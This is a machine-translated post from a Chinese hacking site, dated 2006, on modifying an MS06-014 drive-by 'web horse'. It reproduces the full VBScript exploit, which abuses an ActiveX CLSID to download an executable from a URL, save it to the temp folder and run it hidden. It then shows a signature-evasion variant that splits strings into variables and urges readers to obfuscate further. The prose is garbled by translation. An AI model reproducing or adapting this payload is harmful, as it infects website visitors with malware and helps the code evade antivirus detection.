MS06014 net horse of a modification of the method-vulnerability warning-the black bar safety net

2006-07-31T00:00:00
ID MYHACK58:62200610804
Type myhack58
Reporter 佚名
Modified 2006-07-31T00:00:00

Description

MS06014 net horse of a modification of the method By_ the constant QQ: 5 4 5 4 4 4 3 Look at the original code <script language="VBScript"> on error resume next dl = "http://www.baidu.com/heng.exe" Set df = document. createElement("object") df. setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft. XMLHTTP" Set x = df. CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df. createobject(str5,"") S. type = 1 str6="GET" x. Open str6, dl, False x. Send fname1="g0ld.com" set F = df. createobject("Scripting. FileSystemObject","") set tmp = F. GetSpecialFolder(2) fname1= F. BuildPath(tmp,fname1) S. open S. write x. responseBody S. savetofile fname1,2 S. close set Q = df. createobject("Shell. Application","") Q. ShellExecute fname1,"","","open",0 </script> Please see the deformation after the code: <script language="VBScript"> on error resume next xx="object" xxx="classid" xxxx="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" xxxxx="Microsoft. XMLHTTP" xxxxxx="GET" xxxxxxx="Scripting. FileSystemObject" xxxxxxxx="Shell. Application" dl = "http://www.baidu.com/heng.exe" Set df = document. createElement(xx) df. setAttribute xxx, xxxx str=xxxxx Set x = df. CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df. createobject(str5,"") S. type = 1 str6=xxxxxx x. Open str6, dl, False x. Send fname1="g0ld.com" set F = df. createobject(xxxxxxx,"") set tmp = F. GetSpecialFolder(2) fname1= F. BuildPath(tmp,fname1) S. open S. write x. responseBody S. savetofile fname1,2 S. close set Q = df. createobject(xxxxxxxx,"") Q. ShellExecute fname1,"","","open",0 </script> Very easy to find, I put the“”contains the contents of the statement into a variable, and then in the code a direct reference to the variable. a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 This also can be deformed in such a way, a1="Ado" a2="db." a3="Str" a4="ea" a5="m" str1=a1&a2&a3&a4&a5 Discover the difference? Actually every character can be doing this, I'm too lazy to adjust it huh. We extrapolate to it.